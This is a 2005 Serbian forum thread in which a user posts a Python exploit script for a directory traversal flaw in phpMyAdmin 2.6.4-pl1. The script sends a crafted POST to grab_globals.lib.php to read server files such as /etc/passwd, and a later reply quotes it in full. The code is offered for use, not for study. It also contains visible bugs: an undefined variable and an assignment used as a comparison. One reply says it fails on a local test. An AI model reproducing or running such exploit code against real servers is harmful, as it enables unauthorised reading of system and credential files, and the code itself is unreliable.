phpMyAdmin "grab_globals.lib.php" Remote Directory Traversal Exploit

[ BigBrother2005 @ 19.10.2005. 10:21 ] @

Code:

import httplib
# phpMyAdmin "grab_globals.lib.php" Remote Directory Traversal Exploit
# modified by Crn1vuk5 and translated to Python
#this file could be used as import script
print "\r\n SecurityReason TEAM\r\n";
print "[cXIb8O3] EXPLOIT for phpMyAdmin 2.6.4-pl1\r\n";
print " \r\n";
print "modified by Crn1vuk5 and translated to Python"
print " \r\n";
print "HOST - Host where is phpmyadmin example: http://localhost\r\n";
print "DIR - Directory to PMA example: /phpMyAdmin-2.6.4-pl1/\r\n";
print "FILE - file to inclusion ../../../../../etc/passwd\r\n\r\n";

def  phpMyAdminexploit(Host,Dir,File):
    h=httplib.HTTPConnection(Host)
    dirx=str(Dir)+"libraries/grab_globals.lib.php"
    filex="usesubform[1]=1&usesubform[2]=1&subform[1][redirect]="+str(file)+"&subform[1][cXIb8O3]=1"
    length=len(filex)
    h.putrequest('POST',dirx,'HTTP/1.0')
    print "Sending Exploit to target",Host,dirx,filex
    h.putheader('Host',Host)
    h.putheader('Accept','text/plain;q=0.8,image/png,*/*;q=0.5')
    h.putheader('Accept-Language',' en-us,en;q=0.5')
    h.putheader('Content-Type', 'application/x-www-form-urlencoded')
    h.putheader('Content-Length',length)
    h.endheaders()
    h.send(filex)
    r1 = h.getresponse()
    if r1.status="200 OK":
        print "exploit sent"
    else:
        print "expolit failed"

host_=raw_input("Enter the name of the Host : ")
dir_=raw_input("Enter the name of the Directory:")
file_=raw_input("File to inclusion:")

phpMyAdminexploit(host_,dir_,file_)

_{[Ovu poruku je menjao BigBrother2005 dana 19.10.2005. u 14:50 GMT+1]}

[ unknown-3 @ 19.10.2005. 12:07 ] @

za cega je to cudo?:>

[ Mitrović Srđan @ 19.10.2005. 12:39 ] @

pa vidis valjda da pise u naslovu?
www.phpmyadmin.net/

_{[Ovu poruku je menjao aleksandrin dana 19.10.2005. u 13:39 GMT+1]}

http://phpmyadmin.sourceforge.net/

_{[Ovu poruku je menjao aleksandrin dana 19.10.2005. u 13:40 GMT+1]}

[ anon28907 @ 19.10.2005. 12:47 ] @

prevedeno u python ... c00l

[ BigBrother2005 @ 19.10.2005. 13:53 ] @

potkrala mi se greska... ispravio sam source.. ko ga je probo nek ga ponovo downloaduje...

[ Danilo Cvjeticanin @ 19.11.2005. 19:01 ] @

Citat:

BigBrother2005:

Code:

import httplib
# phpMyAdmin "grab_globals.lib.php" Remote Directory Traversal Exploit
# modified by Crn1vuk5 and translated to Python
#this file could be used as import script
print "\r\n SecurityReason TEAM\r\n";
print "[cXIb8O3] EXPLOIT for phpMyAdmin 2.6.4-pl1\r\n";
print " \r\n";
print "modified by Crn1vuk5 and translated to Python"
print " \r\n";
print "HOST - Host where is phpmyadmin example: http://localhost\r\n";
print "DIR - Directory to PMA example: /phpMyAdmin-2.6.4-pl1/\r\n";
print "FILE - file to inclusion ../../../../../etc/passwd\r\n\r\n";

def phpMyAdminexploit(Host,Dir,File):
h=httplib.HTTPConnection(Host)
dirx=str(Dir)+"libraries/grab_globals.lib.php"
filex="usesubform[1]=1&usesubform[2]=1&subform[1][redirect]="+str(file)+"&subform[1][cXIb8O3]=1"
length=len(filex)
h.putrequest('POST',dirx,'HTTP/1.0')
print "Sending Exploit to target",Host,dirx,filex
h.putheader('Host',Host)
h.putheader('Accept','text/plain;q=0.8,image/png,*/*;q=0.5')
h.putheader('Accept-Language',' en-us,en;q=0.5')
h.putheader('Content-Type', 'application/x-www-form-urlencoded')
h.putheader('Content-Length',length)
h.endheaders()
h.send(filex)
r1 = h.getresponse()
if r1.status="200 OK":
print "exploit sent"
else:
print "expolit failed"

host_=raw_input("Enter the name of the Host : ")
dir_=raw_input("Enter the name of the Directory:")
file_=raw_input("File to inclusion:")

phpMyAdminexploit(host_,dir_,file_)

_{[Ovu poruku je menjao BigBrother2005 dana 19.10.2005. u 14:50 GMT+1]}

Jeste da je proslo mesec dana od izlaska sploita. Ali ovaj sploit ne radi. Tesitrao sam ga na localhostu bas na toj verziji i ne radi.